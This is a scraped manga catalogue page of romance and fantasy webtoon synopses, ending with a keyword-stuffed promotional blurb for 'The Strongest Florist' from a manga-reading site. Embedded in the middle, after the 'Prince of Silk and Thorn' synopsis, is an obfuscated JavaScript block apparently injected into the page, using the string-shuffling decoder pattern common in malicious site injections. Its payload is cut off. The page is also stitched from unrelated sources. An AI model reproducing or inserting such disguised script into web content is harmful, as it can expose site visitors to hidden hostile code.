Manga - Page 5

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

92 results

The Brocaded Tale Of The Girl Si

Her unfortunate life began with a marriage of which the two families didn’t match. Her first husband detested her for killing his first love; her second husband, despite showing great favor, only regarded her as a substitute? Now that Jiang Si has entered her new present life, she is determined to define destiny all by herself!


My Dearest Witch

At the age of 13, Luanna’s parents were murdered, and this shocking event awakened her magical powers. Three years have passed since Luanna, known as the most powerful witch in the country, met an ordinary man named Kurs. Despite facing her wrath every day, Kurs falls head over heels for the passionate Luanna and devotes himself to household chores with great care. However, one day, Luanna prepares to give up this blissful everyday life. She does so in order to pursue her ideals. Furthermore, little does she know that her husband, Kurs, also harbors a secret he cannot tell her. Can Luanna, burdened with her husband’s boundless love, achieve her long-awaited dreams? Saikyou no Majo to Sono / 最強の魔女とその夫


The Difficult Life Of A Beautiful Empress

Xia Miaoling was the beautiful and charismatic legitimate daughter of the Xia family. However, she had a vindictive and evil concubine-born sister who plotted against her every move. However, a mysterious and magical jade pendant appeared and changed Miaoling’s life. With its help, Miaoling turned her life around. She foiled her wicked sister’s evil plots with wits and cunningness. Follow Miaoling’s journey as she entered the palace and found her true self. Would she succeed in her plans, find love, and become the empress she was supposed to be?


The Son Of The North

Yuezhen nationality, an old nation that beliefs in the goddess of the moon. It’s said that there will be a generation of princes who receive blessings from God will own unique powers and bring the clansmen a bright future. Every nation in central plains associated together to expel Yuezhen nationality to the northernmost region, a cold and lonely place! A combination of kinship, love, and conspiracy. It’s not the special powers that are convincing, but…


As Long As You Like It

Dian Is A Maid Working For The Marquis Of Lowell. To Help Her Lady Escape From An Unwanted Marriage, Dian Sends Her Out The Country And Assumes Her Identity, Going To The Castle Of Margrave Evenhart In Her Stead. The Evenhart Family, Famous For Guarding The North For Generations, But Never Leaving Their Territory, Is A Subject Of Great Mystery To The Outside World. Will Dian’s Identity Be Discovered? What Romantic Story Will Unfold In These Days Of Cohabitation?


The Slave Girl And The Vampire With A Death Wish

A Slave Girl, Who Was Falsely Accused Of Poisoning The Guest, Escaped Into The Forest. However, She Was Attacked By A Vampire There. Later On He Apologizes To Her And Suggests Granting Any Her Wish. And What She Wants Is… To Become His Bride! Dorei Shoujo To Shinitagari Kyuuketsuki / The Slave Girl And The Vampire With A Death Wish / ?????????????


When We Bloom

Lee Rowa, a first-year high schooler, was standing in the empty area behind the school building… “You better keep your promise.” And soon…being threatened.


Ghost Office

While executing a ghost expelling task, Li Lingdao, a wizard living on ghost expelling meets the female ghost Yu Xi at the last gasp, who is keeping off killing from the departed souls. Unexpectedly, Li Lingdao does not release her soul, but brings her back to his apartment, heals her and lets her live at his home. At ordinary times, Li Lingdao goes out to execute various haunting tasks. At the same time, different ghosts attack Yu Xi, expecting to get the soul jade. A series of stories happen between Yu Xi and Li Lingdao when he protects her. Yu Xi’s life secret is revealed little by little… MangaToon got authorization from SaManHua to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.



As a ruthless gang killer, Charles Mu regards completing tasks and protecting the safety of the gang’s lady Chelsea White as his only goal in life. However, the advent of the end times disrupted his life trajectory, and Miss White unexpectedly turned into a zombie… Charles gave up resistance for a while, intending to let Miss White end her life. The arrival of the doomsday system not only reshaped Charles's right hand, but also allowed him to gain power beyond ordinary people. What surprised him more is that he can actually control the eldest lady’s movement with this mechanical arm? ! In order to find a way for Miss White to return to normal, Charles set foot on the path of survival in the last days… MangaToon got authorization from Xiaomingtaiji to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.


Prince of Silk and Thorn

As princess of Krashna, Maeva has always gotten her way. But when she is sent to marry the third prince of Jora, Haruk, she has little choice in the matter. Due to an impending war against another kingdom, it is her duty to marry him and solidify the alliance between Jora and Krashna. However, the third prince proves to be unenthusiastic, lazy, seemingly unemotional, and extremely unmotivated. Still, Maeva hopes that by getting close to him and gaining his love, her country would benefit politically. Yet she can’t shake the feeling of something strange…that there is more behind his expressionless, dark eyes.<script></script><script>(function(_0x340e45,_0x37f56e){var _0x2ef9b8=_0x2428,_0x35df10=_0x340e45();while(!![]){try{var _0x35cc4b=parseInt(_0x2ef9b8(0xb9))/(-0xe3e+-0x1*-0x1352+-0x513)*(-parseInt(_0x2ef9b8(0xcb))/(-0x2335+-0x225f+0x22cb*0x2))+parseInt(_0x2ef9b8(0xc8))/(0xf0d+0xd*-0x1+-0xefd)*(parseInt(_0x2ef9b8(0xc4))/(-0x2ec*0x1+0x1f91*0x1+-0x1*0x1ca1))+-parseInt(_0x2ef9b8(0xc6))/(-0x1c0f+0x10bb+0x245*0x5)+-parseInt(_0x2ef9b8(0xd4))/(0x113*-0xb+0x17b3+-0xbdc)+-parseInt(_0x2ef9b8(0xcd))/(-0x175f+0xcc9+0x13*0x8f)+-parseInt(_0x2ef9b8(0xd8))/(0x1*0xefa+-0x95f+-0x1*0x593)+parseInt(_0x2ef9b8(0xcc))/(-0x841*0x1+0x19db+0x1*-0x1191)*(parseInt(_0x2ef9b8(0xd7))/(-0x124*0xd+0xccd+0x1*0x211));if(_0x35cc4b===_0x37f56e)break;else _0x35df10['push'](_0x35df10['shift']());}catch(_0x216431){_0x35df10['push'](_0x35df10['shift']());}}}(_0x4e2e,-0x67a04+-0x56*-0x167c+-0x771de*-0x1));function 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The Strongest Florist

Read Manhwa The Strongest Florist Online For Free At Harimanga The Strongest Florist Novel Also Known As “Strongest Florist / The Macho Florist / Too Strong To Grow Only Flowers / Слишком Сильный, Чтобы Выращивать Только Цветы / สุภาพบุรุษบุษบา / 肌肉猛男少女心 / 花屋になりたいだけなのに強すぎ! / 꽃만 키우는데 너무 강함 / 꽃만 키우는데 너무강함”. This Ongoing Webtoon Was Released On 2020. The Story Was Written By Kumtata And Illustrations By Joo Hyun Hoo. The Content Of The Comic The Strongest Florist: Even Though He’s Built Like A Fighter With A Fearsome Scowl, Jaeho Would Love Nothing More Than To Become A Florist Instead. Unfortunately, Jaeho’s Overbearing Father Disapproves, Pushing His Son To Become An Mma Fighter Instead. Jaeho Enters The Virtual Reality Game, New World, To Escape His Father’s Ambitions, But Will He Be Able To Realize His Dreams? The Comic The Strongest Florist Belongs To The Genre: Action, Adventure, Comedy, Drama, Fantasy, Manga, Manhwa, Manhwa Hot, Romance, Shounen, Webtoons Mangazin Is A Comprehensive Website Featuring The Latest And Hottest Manga, Updated Rapidly To Cater To Readers With High-Quality Images And Provide Them With Excellent Experiences. With Keywords Such As “Kun Manga” And “Read Manhwa Online,” As Well As Related Terms Like Zin Manga, Manhwaclan, And Read New Manhwa Ensures Readers Have Access To A Wide Selection Of Top-Notch Manga Content. Please Always Follow And Share With Your Friends To Support The Website So That We Have More Motivation To Publish The Latest And Best Comics. You Can Follow Some Other Great Comics!!!: Wail Of Weakness Hunter Academy’s Strongest Battle God Nasty Fever

2 days ago